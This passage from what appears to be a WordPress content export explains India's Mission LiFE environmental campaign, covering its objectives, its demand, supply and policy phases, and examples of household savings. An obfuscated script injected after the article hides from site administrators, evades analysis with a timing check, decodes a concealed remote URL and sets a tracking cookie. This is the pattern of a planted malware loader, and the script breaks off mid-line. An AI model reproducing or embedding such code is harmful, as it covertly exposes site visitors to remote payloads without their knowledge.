Lifestyle for Environment"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\"><strong><u>What is Mission LiFE?<\/u><\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Mission LiFE is an India-led global mass movement to <strong>nudge individual<\/strong> and community action <strong>to protect and preserve the environment<\/strong>.<\/li>\n\n\n\n<li><strong>Aim:<\/strong> To combat climate change<\/li>\n\n\n\n<li><strong>Initiated at:<\/strong> COP26 of UNFCCC&nbsp; held in Glasgow<\/li>\n\n\n\n<li>India is the first country to include LiFE in its <strong>Nationally Determined Contributions (NDCs)<\/strong>.<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><strong><u>Objectives of Mission LiFE:<\/u><\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>To translate the vision of LiFE into measurable impact.<\/li>\n\n\n\n<li>To mobilise <strong>at least one billion Indians<\/strong> and other global citizens to take individual and collective action for protecting and preserving the environment during <strong>2022-2027<\/strong>.<\/li>\n\n\n\n<li><strong>Within India, at least 80% of all villages and urban local bodies are aimed to become environment-friendly by 2028<\/strong>.<\/li>\n\n\n\n<li>It aims to nudge individuals and communities to practise a lifestyle that is synchronous with nature and does not harm it.<\/li>\n\n\n\n<li>Those who practise such a lifestyle are recognised as <strong>\u2018Pro Planet People\u2019.<\/strong><\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><strong><u>Need for Mission LiFE:<\/u><\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Environmental degradation and climate change impact ecosystems and populations across the globe.<\/li>\n\n\n\n<li>Nearly <strong>3 billion people<\/strong> are projected to experience <strong>chronic water scarcity due to droughts at 2 C warming<\/strong>.<\/li>\n\n\n\n<li>It is estimated that the global economy could lose up to <strong>18% of GDP by 2050<\/strong> without urgent action by one and all.<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><strong><u>Mission LiFE envisions three core shifts in our collective approach towards sustainability:<\/u><\/strong><\/p>\n\n\n\n<ol class=\"wp-block-list\" type=\"1\">\n<li><strong>Change in Demand (Phase I): <\/strong>Nudging individuals to practise simple yet effective environment-friendly actions in their daily lives.<\/li>\n\n\n\n<li><strong>Change in Supply (Phase II):<\/strong> Changes in large-scale individual demand are expected to gradually nudge industries and markets to respond and tailor supply and procurement as per the revised demands.<\/li>\n\n\n\n<li><strong>Change in Policy (Phase III):<\/strong> By influencing the demand and supply dynamics of India and the world, the long-term vision of Mission LiFE is to trigger shifts in large-scale industrial and government policies that can support both sustainable consumption and production.<\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\"><strong><u>Examples of Mission Life in real time:<\/u><\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Switching off the car\/ scooter engines at traffic lights \/ railway crossings can save up to <strong>22.5 billion kWh of energy<\/strong>.<\/li>\n\n\n\n<li>Turning off running taps when not in active use can save up to <strong>9 trillion litres of water<\/strong>.<\/li>\n\n\n\n<li>Using a cloth bag instead of a plastic bag while shopping can save up to <strong>375 million tonnes of solid waste<\/strong> from entering the landfill.<\/li>\n\n\n\n<li>Discarding non-functioning gadgets in the nearest e-recycling units can recycle up to <strong>0.75 million tonnes of e-waste<\/strong>.<\/li>\n\n\n\n<li>Composting waste food at home can save up to <strong>15 billion tonnes of food<\/strong> from going to landfills.<\/li>\n<\/ul>\n<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1;
